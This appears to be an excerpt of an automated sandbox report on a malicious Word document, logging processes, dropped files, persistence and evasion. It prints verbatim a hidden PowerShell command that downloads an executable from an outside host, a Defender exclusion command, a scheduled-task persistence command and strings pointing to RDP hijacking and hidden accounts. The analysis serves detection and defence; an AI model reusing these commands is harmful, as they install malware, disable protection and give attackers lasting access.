Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\AppData\Roaming\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR52EF.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\explorer.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp

Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains potential unpacker

Source: explorer[1].exe.0.dr, GUI/DangNhap.cs	.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: explorer.exe.4.dr, GUI/DangNhap.cs	.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: eDdYRRbouy.exe.8.dr, GUI/DangNhap.cs	.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.explorer.exe.1330000.0.unpack, GUI/DangNhap.cs	.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Suspicious powershell command line found

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')	Jump to behavior

Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_05893E1C push esi; ret	8_2_05893E1F
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F06979 push ebx; retn 0000h	20_2_05F0697A
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F06930 push ebx; retn 0000h	20_2_05F06932
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F06C80 push ebp; retn 0000h	20_2_05F06C82
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F06850 push edx; retn 0000h	20_2_05F06852
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F06808 push edx; retn 0000h	20_2_05F0680A
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F06AE0 push esp; retn 0000h	20_2_05F06AE2
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F06A99 push esp; retn 0000h	20_2_05F06A9A
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F03E1C push esi; ret	20_2_05F03E1F
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_05503E1C push esi; ret	29_2_05503E1F

Source: explorer[1].exe.0.dr

Static PE information: 0xA015504D [Tue Feb 9 02:02:53 2055 UTC]

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\explorer.exe

Jump to dropped file

Tries to download and execute files (via powershell)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')	Jump to behavior

Source: C:\Users\user\AppData\Roaming\explorer.exe	File created: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\explorer.exe	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Roaming\explorer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete

Jump to behavior

Contains functionality to hide user accounts

Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
